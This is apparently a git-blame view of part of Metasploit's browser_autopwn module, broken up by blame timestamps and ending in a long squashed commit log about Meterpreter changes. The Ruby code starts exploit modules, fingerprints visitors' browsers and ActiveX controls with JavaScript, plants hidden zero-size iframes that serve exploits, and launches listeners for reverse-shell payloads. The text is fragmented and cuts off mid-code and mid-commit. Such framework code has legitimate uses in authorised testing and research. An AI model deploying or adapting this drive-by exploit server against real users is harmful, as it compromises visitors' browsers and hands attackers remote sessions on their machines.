|
if framework.jobs[@exploits[name].job_id.to_s].nil?
|
|
|
|
print_error("Failed to start exploit module #{name}")
|
|
|
|
@exploits.delete(name)
|
|
|
|
return false
|
|
|
|
end
|
2010-07-11 23:53:47 +00:00
|
|
|
|
|
|
|
# Since r9714 or so, exploit_simple copies the module instead of
|
|
|
|
# operating on it directly when creating a job. Put the new copy into
|
|
|
|
# our list of running exploits so we have access to its state. This
|
|
|
|
# allows us to get the correct URI for each exploit in the same manor
|
|
|
|
# as before, using mod.get_resource().
|
|
|
|
@exploits[name] = framework.jobs[@exploits[name].job_id.to_s].ctx[0]
|
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
return true
|
2008-07-01 01:44:56 +00:00
|
|
|
end
|
|
|
|
|
2009-08-06 05:56:24 +00:00
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
def start_exploit_modules()
|
2009-07-22 20:14:35 +00:00
|
|
|
@lhost = (datastore['LHOST'] || "0.0.0.0")
|
2008-07-01 01:44:56 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
@js_tests = {}
|
|
|
|
@noscript_tests = {}
|
2009-07-19 20:48:47 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
print_line
|
|
|
|
print_status("Starting exploit modules on host #{@lhost}...")
|
|
|
|
print_status("---")
|
|
|
|
print_line
|
2011-05-20 09:11:43 +00:00
|
|
|
each_autopwn_module do |name, mod|
|
|
|
|
# Start the module. If that fails for some reason, don't bother
|
|
|
|
# adding tests for it.
|
|
|
|
next if !(init_exploit(name))
|
|
|
|
|
|
|
|
apo = mod.autopwn_opts.dup
|
|
|
|
apo[:name] = name.dup
|
|
|
|
apo[:vuln_test] ||= ""
|
|
|
|
|
|
|
|
if apo[:classid]
|
|
|
|
# Then this is an IE exploit that uses an ActiveX control,
|
|
|
|
# build the appropriate tests for it.
|
|
|
|
apo[:vuln_test] = ""
|
|
|
|
apo[:ua_name] = HttpClients::IE
|
2012-04-18 00:54:26 +00:00
|
|
|
conditions = []
|
2011-05-20 09:11:43 +00:00
|
|
|
if apo[:classid].kind_of?(Array) # then it's many classids
|
|
|
|
apo[:classid].each { |clsid|
|
2012-04-18 00:54:26 +00:00
|
|
|
if apo[:method].kind_of?(Array) # then it's many methods
|
|
|
|
conditions += apo[:method].map { |m| "testAXO('#{clsid}', '#{m}')" }
|
|
|
|
else
|
|
|
|
conditions.push "testAXO('#{clsid}', '#{method}')"
|
|
|
|
end
|
2011-05-20 09:11:43 +00:00
|
|
|
}
|
2009-11-24 21:40:02 +00:00
|
|
|
end
|
2012-04-18 00:54:26 +00:00
|
|
|
apo[:vuln_test] << "if (#{conditions.join("||")}) {\n"
|
|
|
|
apo[:vuln_test] << " is_vuln = true;\n"
|
|
|
|
apo[:vuln_test] << "}\n"
|
2011-05-20 09:11:43 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# If the exploit supplies a min/max version, build up a test to
|
|
|
|
# check for the proper version. Note: The version comparison
|
|
|
|
# functions come from javascriptosdetect.
|
2011-06-03 00:36:26 +00:00
|
|
|
js_d_ver = @init_js.sym("detected_version")
|
2011-05-20 09:11:43 +00:00
|
|
|
if apo[:ua_minver] and apo[:ua_maxver]
|
|
|
|
ver_test =
|
2011-06-03 00:36:26 +00:00
|
|
|
"!#{@init_js.sym("ua_ver_lt")}(#{js_d_ver}['ua_version'], '#{apo[:ua_minver]}') && " +
|
|
|
|
"!#{@init_js.sym("ua_ver_gt")}(#{js_d_ver}['ua_version'], '#{apo[:ua_maxver]}')"
|
2011-05-20 09:11:43 +00:00
|
|
|
elsif apo[:ua_minver]
|
2011-06-03 00:36:26 +00:00
|
|
|
ver_test = "!#{@init_js.sym("ua_ver_lt")}(#{js_d_ver}['ua_version'], '#{apo[:ua_minver]}')\n"
|
2011-05-20 09:11:43 +00:00
|
|
|
elsif apo[:ua_maxver]
|
2011-06-03 00:36:26 +00:00
|
|
|
ver_test = "!#{@init_js.sym("ua_ver_gt")}(#{js_d_ver}['ua_version'], '#{apo[:ua_maxver]}')\n"
|
2011-05-20 09:11:43 +00:00
|
|
|
else
|
|
|
|
ver_test = nil
|
|
|
|
end
|
|
|
|
|
|
|
|
# if we built a version check above, add it to the normal test
|
|
|
|
if ver_test
|
2009-12-16 00:13:57 +00:00
|
|
|
test = "if (#{ver_test}) { "
|
|
|
|
test << (apo[:vuln_test].empty? ? "is_vuln = true;" : apo[:vuln_test])
|
|
|
|
test << "} else { is_vuln = false; }\n"
|
|
|
|
apo[:vuln_test] = test
|
2011-05-20 09:11:43 +00:00
|
|
|
end
|
2009-12-16 00:13:57 +00:00
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
# Now that we've got all of our exploit tests put together,
|
|
|
|
# organize them into requires-scripting and
|
|
|
|
# doesnt-require-scripting, sorted by browser name.
|
|
|
|
if apo[:javascript] && apo[:ua_name]
|
|
|
|
@js_tests[apo[:ua_name]] ||= []
|
|
|
|
@js_tests[apo[:ua_name]].push(apo)
|
|
|
|
elsif apo[:javascript]
|
|
|
|
@js_tests["generic"] ||= []
|
|
|
|
@js_tests["generic"].push(apo)
|
|
|
|
elsif apo[:ua_name]
|
|
|
|
@noscript_tests[apo[:ua_name]] ||= []
|
|
|
|
@noscript_tests[apo[:ua_name]].push(apo)
|
|
|
|
else
|
|
|
|
@noscript_tests["generic"] ||= []
|
|
|
|
@noscript_tests["generic"].push(apo)
|
2008-07-22 07:28:05 +00:00
|
|
|
end
|
2008-07-01 01:44:56 +00:00
|
|
|
end
|
2011-05-20 09:11:43 +00:00
|
|
|
|
2009-11-11 21:38:30 +00:00
|
|
|
# start handlers for each type of payload
|
2010-08-20 20:49:33 +00:00
|
|
|
[@win_lport, @lin_lport, @osx_lport, @gen_lport, @java_lport].each do |lport|
|
2009-11-11 21:38:30 +00:00
|
|
|
if (lport and @payloads[lport])
|
|
|
|
print_status("Starting handler for #{@payloads[lport]} on port #{lport}")
|
|
|
|
multihandler = framework.modules.create("exploit/multi/handler")
|
2010-10-01 14:06:59 +00:00
|
|
|
multihandler.datastore['MODULE_OWNER'] = self.datastore['MODULE_OWNER']
|
|
|
|
multihandler.datastore['WORKSPACE'] = datastore["WORKSPACE"] if datastore["WORKSPACE"]
|
2011-01-17 22:15:22 +00:00
|
|
|
multihandler.datastore['ParentUUID'] = datastore["ParentUUID"] if datastore["ParentUUID"]
|
2012-09-20 20:20:20 +00:00
|
|
|
multihandler.datastore['CAMPAIGN_ID'] = datastore["CAMPAIGN_ID"] if datastore["CAMPAIGN_ID"]
|
|
|
|
multihandler.datastore['BAP'] = true
|
2011-01-17 22:15:22 +00:00
|
|
|
multihandler.datastore['AutopwnUUID'] = self.uuid
|
2009-11-11 21:38:30 +00:00
|
|
|
multihandler.datastore['LPORT'] = lport
|
|
|
|
multihandler.datastore['LHOST'] = @lhost
|
|
|
|
multihandler.datastore['ExitOnSession'] = false
|
|
|
|
multihandler.datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread'
|
2011-01-06 21:18:24 +00:00
|
|
|
multihandler.datastore["ReverseListenerBindAddress"] = datastore["ReverseListenerBindAddress"]
|
2010-07-12 05:19:38 +00:00
|
|
|
# XXX: Revisit this when we have meterpreter working on more than just windows
|
2012-09-22 21:26:31 +00:00
|
|
|
if (lport == @win_lport or lport == @java_lport)
|
2010-07-12 05:19:38 +00:00
|
|
|
multihandler.datastore['AutoRunScript'] = datastore['AutoRunScript']
|
|
|
|
multihandler.datastore['AutoSystemInfo'] = datastore['AutoSystemInfo']
|
|
|
|
multihandler.datastore['InitialAutoRunScript'] = datastore['InitialAutoRunScript']
|
|
|
|
end
|
2009-11-11 21:38:30 +00:00
|
|
|
multihandler.exploit_simple(
|
|
|
|
'LocalInput' => self.user_input,
|
|
|
|
'LocalOutput' => self.user_output,
|
|
|
|
'Payload' => @payloads[lport],
|
|
|
|
'RunAsJob' => true)
|
2010-08-30 22:17:26 +00:00
|
|
|
@handler_job_ids.push(multihandler.job_id)
|
2009-11-11 21:38:30 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
# let the handlers get set up
|
|
|
|
Rex::ThreadSafe.sleep(0.5)
|
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
print_line
|
2009-12-16 00:13:57 +00:00
|
|
|
print_status("--- Done, found %bld%grn#{@exploits.length}%clr exploit modules")
|
2009-07-22 20:14:35 +00:00
|
|
|
print_line
|
2008-07-01 01:44:56 +00:00
|
|
|
|
2009-12-16 00:13:57 +00:00
|
|
|
# Sort the tests by reliability, descending.
|
2009-07-22 20:14:35 +00:00
|
|
|
@js_tests.each { |browser,tests|
|
|
|
|
tests.sort! {|a,b| b[:rank] <=> a[:rank]}
|
|
|
|
}
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
# This matters a lot less for noscript exploits since they basically
|
|
|
|
# get thrown into a big pile of iframes that the browser will load
|
|
|
|
# semi-concurrently. Still, might as well.
|
2009-07-22 20:14:35 +00:00
|
|
|
@noscript_tests.each { |browser,tests|
|
|
|
|
tests.sort! {|a,b| b[:rank] <=> a[:rank]}
|
|
|
|
}
|
2009-07-19 20:48:47 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
#
|
|
|
|
# Main dispatcher method for when we get a request
|
|
|
|
#
|
2010-04-30 08:40:19 +00:00
|
|
|
def on_request_uri(cli, request)
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("Handling '#{request.uri}'")
|
2009-07-22 20:14:35 +00:00
|
|
|
|
|
|
|
case request.uri
|
|
|
|
when self.get_resource
|
|
|
|
# This is the first request. Send the javascript fingerprinter and
|
|
|
|
# hope it sends us back some data. If it doesn't, javascript is
|
|
|
|
# disabled on the client and we will have to do a lot more
|
|
|
|
# guessing.
|
|
|
|
response = create_response()
|
|
|
|
response["Expires"] = "0"
|
|
|
|
response["Cache-Control"] = "must-revalidate"
|
|
|
|
response.body = @init_html
|
|
|
|
cli.send_response(response)
|
|
|
|
when %r{^#{self.get_resource}.*sessid=}
|
|
|
|
# This is the request for the exploit page when javascript is
|
|
|
|
# enabled. Includes the results of the javascript fingerprinting
|
|
|
|
# in the "sessid" parameter as a base64 encoded string.
|
|
|
|
record_detection(cli, request)
|
2009-08-06 05:56:24 +00:00
|
|
|
if (action.name == "DefangedDetection")
|
|
|
|
response = create_response()
|
2011-06-03 00:36:26 +00:00
|
|
|
response.body = "#{js_debug("'Please wait'")}"
|
2009-08-06 05:56:24 +00:00
|
|
|
else
|
|
|
|
response = build_script_response(cli, request)
|
|
|
|
end
|
2011-05-20 09:11:43 +00:00
|
|
|
response["Expires"] = "0"
|
|
|
|
response["Cache-Control"] = "must-revalidate"
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-07-22 20:14:35 +00:00
|
|
|
cli.send_response(response)
|
|
|
|
when %r{^#{self.get_resource}.*ns=1}
|
|
|
|
# This is the request for the exploit page when javascript is NOT
|
|
|
|
# enabled. Since scripting is disabled, fall back to useragent
|
|
|
|
# detection, which is kind of a bummer since it's so easy for the
|
|
|
|
# ua string to lie. It probably doesn't matter that much because
|
|
|
|
# most of our exploits require javascript anyway.
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("Browser has javascript disabled, trying exploits that don't need it")
|
2009-07-22 20:14:35 +00:00
|
|
|
record_detection(cli, request)
|
2010-03-24 16:28:04 +00:00
|
|
|
if (action.name == "DefangedDetection")
|
|
|
|
response = create_response()
|
|
|
|
response.body = "Please wait"
|
|
|
|
else
|
|
|
|
response = build_noscript_response(cli, request)
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-03-24 16:28:04 +00:00
|
|
|
response["Expires"] = "0"
|
|
|
|
response["Cache-Control"] = "must-revalidate"
|
2009-07-22 20:14:35 +00:00
|
|
|
cli.send_response(response)
|
|
|
|
else
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("404ing #{request.uri}")
|
2009-07-22 20:14:35 +00:00
|
|
|
send_not_found(cli)
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
def html_for_exploit(autopwn_info, client_info)
|
|
|
|
html = ""
|
|
|
|
|
|
|
|
html << (autopwn_info[:prefix_html] || "") + "\n"
|
|
|
|
html << build_iframe(exploit_resource(autopwn_info[:name])) + "\n"
|
|
|
|
html << (autopwn_info[:postfix_html] || "") + "\n"
|
|
|
|
|
|
|
|
if (HttpClients::IE == autopwn_info[:ua_name])
|
|
|
|
html = "<!--[if IE]>\n#{html}\n<![endif]-->\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
html
|
|
|
|
end
|
|
|
|
|
2010-07-11 23:53:47 +00:00
|
|
|
def build_noscript_html(cli, request)
|
2009-12-29 23:48:45 +00:00
|
|
|
client_info = get_client(:host => cli.peerhost, :ua_string => request['User-Agent'])
|
2010-07-11 23:53:47 +00:00
|
|
|
body = ""
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2012-04-04 00:22:56 +00:00
|
|
|
sploit_cnt = 0
|
2009-07-22 20:14:35 +00:00
|
|
|
@noscript_tests.each { |browser, sploits|
|
|
|
|
next if sploits.length == 0
|
2010-07-11 23:53:47 +00:00
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
next unless client_matches_browser(client_info, browser)
|
|
|
|
|
|
|
|
sploits.each do |s|
|
|
|
|
body << html_for_exploit( s, client_info )
|
2009-07-22 20:14:35 +00:00
|
|
|
end
|
2012-04-04 00:22:56 +00:00
|
|
|
sploit_cnt += 1
|
2009-07-22 20:14:35 +00:00
|
|
|
}
|
2012-04-11 06:26:25 +00:00
|
|
|
print_status("Responding with #{sploit_cnt} non-javascript exploits")
|
2010-07-11 23:53:47 +00:00
|
|
|
body
|
|
|
|
end
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2010-07-11 23:53:47 +00:00
|
|
|
def build_noscript_response(cli, request)
|
|
|
|
|
|
|
|
response = create_response()
|
|
|
|
response['Expires'] = '0'
|
|
|
|
response['Cache-Control'] = 'must-revalidate'
|
|
|
|
|
|
|
|
response.body = "<html > <head > <title > Loading </title> </head> "
|
|
|
|
response.body << "<body> "
|
2009-12-16 00:13:57 +00:00
|
|
|
response.body << "Please wait "
|
2010-08-18 23:20:16 +00:00
|
|
|
response.body << build_noscript_html(cli, request)
|
2009-07-22 20:14:35 +00:00
|
|
|
response.body << "</body> </html> "
|
|
|
|
|
|
|
|
return response
|
|
|
|
end
|
|
|
|
|
2011-05-20 09:11:43 +00:00
|
|
|
#
|
|
|
|
# Build some javascript that attempts to determine which exploits to run
|
|
|
|
# for the victim's OS and browser.
|
2011-10-17 02:42:01 +00:00
|
|
|
#
|
2011-05-20 09:11:43 +00:00
|
|
|
# Returns a raw javascript string to be eval'd on the victim
|
|
|
|
#
|
2009-07-22 20:14:35 +00:00
|
|
|
def build_script_response(cli, request)
|
|
|
|
response = create_response()
|
|
|
|
response['Expires'] = '0'
|
|
|
|
response['Cache-Control'] = 'must-revalidate'
|
|
|
|
|
2012-04-05 07:33:07 +00:00
|
|
|
# Host info no longer comes from the database! This is strictly a value
|
|
|
|
# that came back from javascript OS detection because NAT basically
|
|
|
|
# makes it impossible to keep host/client mappings straight.
|
2010-03-04 07:37:58 +00:00
|
|
|
client_info = get_client(:host => cli.peerhost, :ua_string => request['User-Agent'])
|
2012-04-05 07:33:07 +00:00
|
|
|
host_info = client_info[:host]
|
2009-07-23 08:43:54 +00:00
|
|
|
#print_status("Client info: #{client_info.inspect}")
|
2009-07-22 20:14:35 +00:00
|
|
|
|
2011-06-03 00:36:26 +00:00
|
|
|
js = "var global_exploit_list = []\n";
|
2009-08-06 05:56:24 +00:00
|
|
|
# If we didn't get a client from the database, then the detection
|
|
|
|
# is borked or the db is not connected, so fallback to sending
|
|
|
|
# some IE-specific stuff with everything. Do the same if the
|
|
|
|
# exploit didn't specify a client. Otherwise, make sure this is
|
|
|
|
# IE before sending code for ActiveX checks.
|
2009-07-23 08:43:54 +00:00
|
|
|
if (client_info.nil? || [nil, HttpClients::IE].include?(client_info[:ua_name]))
|
2009-07-22 20:14:35 +00:00
|
|
|
# If we have a class name (e.g.: "DirectAnimation.PathControl"),
|
|
|
|
# use the simple and direct "new ActiveXObject()". If we
|
2009-08-06 05:56:24 +00:00
|
|
|
# have a classid instead, first try creating the object
|
2009-07-22 20:14:35 +00:00
|
|
|
# with createElement("object"). However, some things
|
|
|
|
# don't like being created this way (specifically winzip),
|
|
|
|
# so try writing out an object tag as well. One of these
|
|
|
|
# two methods should succeed if the object with the given
|
|
|
|
# classid can be created.
|
|
|
|
js << <<-ENDJS
|
2012-04-18 00:54:26 +00:00
|
|
|
window.testAXO = function(axo_name, method) {
|
2009-07-22 20:14:35 +00:00
|
|
|
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
|
|
|
|
axobj = document.createElement("object");
|
|
|
|
axobj.setAttribute("classid", "clsid:" + axo_name);
|
|
|
|
axobj.setAttribute("id", axo_name);
|
|
|
|
axobj.setAttribute("style", "visibility: hidden");
|
|
|
|
axobj.setAttribute("width", "0px");
|
|
|
|
axobj.setAttribute("height", "0px");
|
|
|
|
document.body.appendChild(axobj);
|
|
|
|
if (typeof(axobj[method]) == 'undefined') {
|
|
|
|
var attributes = 'id="' + axo_name + '"';
|
|
|
|
attributes += ' classid="clsid:' + axo_name + '"';
|
|
|
|
attributes += ' style="visibility: hidden"';
|
|
|
|
attributes += ' width="0px" height="0px"';
|
|
|
|
document.body.innerHTML += "<object " + attributes + "></object>";
|
|
|
|
axobj = document.getElementById(axo_name);
|
2009-07-19 20:48:47 +00:00
|
|
|
}
|
2009-07-22 20:14:35 +00:00
|
|
|
} else {
|
|
|
|
try {
|
|
|
|
axobj = new ActiveXObject(axo_name);
|
|
|
|
} catch(e) {
|
2012-04-18 00:54:26 +00:00
|
|
|
// If we can't build it with an object tag and we can't build it
|
|
|
|
// with ActiveXObject, it can't be built.
|
|
|
|
return false;
|
2009-07-22 20:14:35 +00:00
|
|
|
};
|
|
|
|
}
|
|
|
|
#{js_debug('axo_name + "." + method + " = " + typeof axobj[method] + "<br/>"')}
|
|
|
|
if (typeof(axobj[method]) != 'undefined') {
|
|
|
|
return true;
|
2009-07-19 17:27:36 +00:00
|
|
|
}
|
2009-07-22 20:14:35 +00:00
|
|
|
return false;
|
2012-04-18 00:54:26 +00:00
|
|
|
};
|
2009-07-22 20:14:35 +00:00
|
|
|
ENDJS
|
|
|
|
# End of IE-specific test functions
|
|
|
|
end
|
2009-08-06 05:56:24 +00:00
|
|
|
# Generic stuff that is needed regardless of what browser was detected.
|
2009-07-22 20:14:35 +00:00
|
|
|
js << <<-ENDJS
|
|
|
|
var written_iframes = new Array();
|
2012-04-08 23:06:23 +00:00
|
|
|
window.write_iframe = function (myframe) {
|
2009-07-22 20:14:35 +00:00
|
|
|
var iframe_idx; var mybody;
|
|
|
|
for (iframe_idx in written_iframes) {
|
|
|
|
if (written_iframes[iframe_idx] == myframe) {
|
|
|
|
return;
|
|
|
|
}
|
2009-07-19 20:48:47 +00:00
|
|
|
}
|
2009-07-22 20:14:35 +00:00
|
|
|
written_iframes[written_iframes.length] = myframe;
|
|
|
|
str = '';
|
|
|
|
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
|
|
|
|
document.body.innerHTML += (str);
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
